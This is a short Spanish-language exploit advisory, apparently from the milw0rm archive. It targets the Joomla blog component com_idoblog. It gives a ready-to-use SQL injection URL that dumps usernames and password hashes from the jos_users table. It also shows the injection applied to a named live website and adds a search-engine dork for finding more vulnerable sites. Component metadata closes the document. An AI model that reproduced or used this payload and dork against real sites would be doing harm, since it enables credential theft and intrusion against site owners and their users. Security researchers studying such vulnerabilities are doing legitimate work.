33 lines
No EOL
1.8 KiB
Text
33 lines
No EOL
1.8 KiB
Text
#####################################################################################
|
|
#### com_idoblog SQL Injection ALL VERSIONS ####
|
|
#####################################################################################
|
|
# #
|
|
# Descubierto por : KKR #
|
|
# Somos: knet, kiko, ricota, servl #
|
|
# Contacto: elricota[*A*T*]gmail[*D*O*T]com #
|
|
#####################################################################################
|
|
[+] Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
|
|
[+] Esta sql injection afecta todas las versiones.
|
|
[-]
|
|
[+] exploit:
|
|
[-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=<usuario existente>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
|
|
[+]
|
|
[-] Ejemplo:
|
|
[+] http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
|
|
[-]
|
|
[+] d0rk: inurl:"com_idoblog"
|
|
[-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/
|
|
[-----------------------------------------------------------------------------------]
|
|
|
|
note:
|
|
<name>idoblog</name>
|
|
<creationDate>17 07 2008</creationDate>
|
|
<author>Sunshine studio</author>
|
|
<authorEmail>kotofeus@mail.ru</authorEmail>
|
|
<authorUrl>http://sunshinestudio.ru</authorUrl>
|
|
<copyright>Sunshine studio</copyright>
|
|
<license>Creative Commons v3.0</license>
|
|
<version>v 1.1 (build 30)</version>
|
|
<description>Blogs-system for Joomla 1.5</description>
|
|
|
|
# milw0rm.com [2009-08-11] |